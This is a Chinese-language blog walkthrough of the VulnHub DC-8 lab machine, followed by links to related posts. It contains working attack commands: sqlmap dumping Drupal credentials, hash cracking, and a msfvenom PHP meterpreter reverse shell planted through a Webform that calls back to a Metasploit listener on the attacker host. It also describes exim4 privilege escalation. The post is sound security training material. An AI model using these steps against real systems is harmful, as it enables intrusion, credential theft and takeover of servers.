DC: 8靶机-Walkthrough

最新推荐文章于 2024-10-16 10:40:57 发布
最新推荐文章于 2024-10-16 10:40:57 发布
阅读量808 收藏 4
点赞数 2
分类专栏: VulnHub 文章标签: Linux 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214107/article/details/101276913
版权

靶机地址
难度:未定义

博客中如有任何问题,恳请批评指正,万分感谢。个人邮箱:want2live233@gmail.com

工具、知识点和漏洞

netdiscover
nmap
dirsearch
msfvenom
metasploit
searchsploit
exim 4.87-4.91本地提权漏洞

存疑、待解决

  • 为什么shell代码之前要添加其他任意的字符?

0x01、信息收集

靶机IP

netdiscover -r 192.168.0.0/24

在这里插入图片描述
端口和服务

nmap -sS -sV -T4 -A -p- 192.168.0.110

在这里插入图片描述
Drupal 7

./droopescan scan drupal -u http://192.168.0.110 -e a

在这里插入图片描述

python3 drupwn --users --nodes --modules --dfiles --themes enum http://192.168.0.110

在这里插入图片描述
默认管理员用户admin的UID为1

0x02、SQLi获取后台登录口令

网站首页
在这里插入图片描述
是不是以为首页左边的无序列表和上面的菜单栏各自对应的链接一样?嗨呀,要是你的第一反应跟我一样,觉得是一样的,那就大错特错了。

HomeWho We AreContact Us
http://192.168.0.110/http://192.168.0.110/node/2http://192.168.0.110/node/3

VS

Welcome to DC-8Who We AreContact Us
http://192.168.0.110/?nid=1http://192.168.0.110/?nid=2http://192.168.0.110/?nid=3

看到id就想到SQL注入(SQLi),看到留言就想到XSS
在这里插入图片描述
祭出神器SQLMap

sqlmap -u "http://192.168.0.110/?nid=1" --dbs
sqlmap -u "http://192.168.0.110/?nid=1" -D d7db --tables
sqlmap -u "http://192.168.0.110/?nid=1" -D d7db -T users --columns
sqlmap -u "http://192.168.0.110/?nid=1" -D d7db -T users -C name,pass --dump

在这里插入图片描述
hash-identifier没有识别出加密算法,直接用John the Ripper破解
在这里插入图片描述
在这里插入图片描述

0x03、Drupal Webform反弹shell

使用john/turtle登录后台,准备反弹shell

关于Drupal反弹shell,请看164-drupal-to-reverse-shell

如果你看过我写的DC:7靶机-Walkthrough,你可能会想到通过Add content-->Basic page去添加一个webshell,但是在这个靶机里面我们是通过Add content-->Webform去添加webshell的。
Title填好之后直接回车
在这里插入图片描述
点击右上角的WEBFROM按钮,先在下方添加一个留言框,设置好留言框的名字,就是在Label下面填入,留言框的类型就设置成Textfield,点击右侧的Add,然后点击Form settings,填入shell代码
在这里插入图片描述webshell我是用msfvenom生成的

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=1234 R > shell.php

设置Text formatPHP code,页面拉到最下面,点击Save configuration,之后会在顶部提示设置已经更新完毕。这个时候不要关闭这个配置页面,而是点击右上角的VIEW按钮
在这里插入图片描述

注意:上面除了shell代码之外,必须加一些其他的东西,不然无法反弹shell。这一步我真是卡了好一会儿,最后是看了一下老外写的walkthrough,汗颜(人_人)

然后在下图输入框中随便输入点什么

留言区域上方的shell in there忽略,这个我写错了。

在这里插入图片描述
然后点击下方的按钮webshell,这个名字是自己定义的,我这里是webshell,之后会跳转到最终的提交页面,在点击下方的Submit按钮之前,你需要先在kali上监听端口,我这里使用的metasploit,因为shell代码是msfvenom生成的。
在这里插入图片描述
msfconsole接收反弹的shell

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 1234
run

在这里插入图片描述
我这里是自己新建了一个Webform,其实我们可以直接通过点击网页顶部导航栏里的Contact Us,因为它也是一个Webform,然后去点击Webform–>Form settings,在输入区域加入shell代码,设置Text formatPHP code
在这里插入图片描述在这里插入图片描述

0x04、exim4提权

直接用脚本搜集一下对于提权有用的信息,老样子还是用linuxprivchecker.py

如果你想熟悉一下没有脚本的情况下怎么收集这些信息可以参考privilege_escalation_-_linux

为了便于查看收集到的信息,我将结果输出到report.txt文本中,随后用less命令进行查看

python linuxprivchecker.py > report.txt
less report.txt

在SUID可执行文件中我发现了之前没见过的一个程序exim4
在这里插入图片描述
在这里插入图片描述
exploit-db相关链接

第一次执行报错,又是因为不同系统之间编码格式的问题造成的,解决方案
在这里插入图片描述

exp中提供了两种提权方式,我最开始尝试使用setuid的方法,结果提示cp: cannot create regular file '/tmp/pwned': Text file busy
在这里插入图片描述
后来使用了第二种方法成功提权
在这里插入图片描述

0x05、后记

后面我对shell代码前面没有其他字符有其他字符的两种情况进行了抓包对比,但是没有分析出什么东西。

如果您有其他的方法,欢迎留言。若文中有任何错误,恳请批评指正。

1nsIght
关注
专栏目录
靶机DC-8(详细渗透,适合新手渗透)
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC:7靶机-Walkthrough
ins1ght的博客
09-23 2537
目前为止,做过的vlunhub里面的靶机里,这个算是比较开脑洞的了。首先发现网站首页footer部分多出的一个@DC7USER,这与一个未经DIY的Drupal站点的footer展示内容不同,进而通过Google搜索发现了放在Github上的系统登录口令,才有了后续的一系列操作。回忆起之前在某CTF大赛中打酱油的经历,那个时候也有一道Web题目,也是通过放在Github上的一个项目为突破口。历史真是TM惊人的相似……
DC8靶机
qq_40646572的博客
05-13 406
信息收集 开启dc8靶机 使用nmap扫描下当前网段。发现存在dc8靶机192.168.85.139主机。且主机开启了22端口以及80端口。 打开http服务。 web——getshell 经过测试,在home页面中,点击侧边栏,存在nid参数,经过测试该处存在sql注入点。 经过测试,当前数据表存在一个字段。 使用联合注入的方式获取到当前数据库名,d7db。 获取当前数据库的表个信息。看到当前数据库存在users数据表格。 Payload= nid=-1 union select gr
vulnhub靶机系列之Bottleneck
m0_74028691的博客
09-23 150
得到22和80端口,在链接IP网址。首先信息收集做好靶机和主机的互通。安装gobuster。
DC-8靶机
m0_62094846的博客
07-07 299
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.137 -p- -oN nmap137.A点不同的选项,uid会变猜测有sql注入sqlmap -u "http://192.168.61.137/?nid=1"sqlmap -u "http://192.168.61.137/?nid=1" --dbs数据库:d7db 和 information_schemasqlmap -
vulnhub之DC8靶机
LainWith的博客
02-15 2999
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
DC靶机系列:DC-8
Ays.Ie的博客
02-28 296
本篇文章为DC系列第8个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
『VulnHub系列』DC- 1-Walkthrough.pdf
10-30
总结来说,VulnHub系列DC-1的walkthrough文档详细介绍了从信息收集、漏洞扫描、漏洞利用到提权、寻找flag等一系列渗透测试的实战步骤。对于初学者而言,通过这样的实战练习,可以加深对Linux系统、网络服务、渗透...
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4740
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
VulnHub靶机实战教程:全面解析与 Walkthrough
4. **DC系列** - DC靶机是VulnHub上非常受欢迎的一系列,通常包含多层面的挑战,涵盖网络侦查、端口扫描、漏洞分析、密码破解等多个方面。 5. **EVM:1** 和 **GoldenEye:1** - 这些靶机可能涉及到更复杂的安全概念...
渗透测试:DC-8靶机
Ciyaso的博客
08-23 626
一、扫描获取靶机ip arp-scan -l 192.168.203.147 二、获取网站信息 1.nmap 开放22、80端口 2.Wappaloyzer CMS:Drupal Web服务器:Apache 访问网站 3.sqlmap 点击Details下的选项发现url的nid=会发生变化, 在1后面加一个单引号,发现报错,说明存在sql注入 使用sqlmap sqlmap -u http://192.168.203.147/?nid=1 爆库 sqlmap -u http://192.
DC-8 靶机
日常打一些漏洞靶机
07-29 399
根据对比可知DC-8的一个ip地址为192.168.47.133。经过测试发现正确的账户名和密码为john和turtle。选择一个不需要root用户权限的目录,比如tmp。可得出一个叫turtle的密码。ps:如果出现下述情况可输入。出现robots.txt文件。发现存在用户登录的一个界面。选择使用46996.sh。出现root说明提权成功。发现一个比较奇怪的命令。
DC-8靶机(SQL注入,46996.sh提权)
m0_66299232的博客
11-19 360
用nmap探测靶机开放端口和对应服务情况 nmap -p- -A -T4 192.168.166.136。6.把密码写进hash.txt里用john工具破解出一个密码。1.用find命令查询以suid权限执行的文件。1.探测目标靶机ip arp-scan -l。5.开启http服务,将脚本下载到靶机。8.写入php代码,反弹shell.虚拟机网络链接模式:桥接模式。2.发现一个exim4可利用。4.下载到当前目录下并查看。6.给执行权限,执行没成功。3.查询相关利用脚本。7.添加参数提权成功。
DC8-靶机
Au
12-22 2333
下载地址 配置的环境: kali:192.168.25.131 DC8-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.129,判定为DC8-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.168.25...
dc-1靶机
qq_63267612的博客
09-28 1342
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf。
No.1-Bastion-难度简单-HTB-walkthrough
weixin_43851945的博客
01-10 1982
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体...
渗透测试学习之靶机DC-8
情感博主V
03-16 500
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,获得目标主机IP:192.168.246.145 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.145 web站点相关服务信息 3. sql注入 在前面点击Details的几个链接,然后发现url里有个nid参数,尝试检测注入: 单引号报错:错误信息是多了个单引号 ...
DC-8靶机教程
qq_40863723的博客
02-17 1737
多喝热水:http://hackergu.com/ 一、主机发现 ​ 使用netdiscover,发现主机IP为192.168.203.134。 二、端口扫描 root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 22:40 CST ...
靶机实战:DC-8
最新发布
CHAsichuan的博客
10-16 762
一次较高难度的靶机实战分享和记录
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值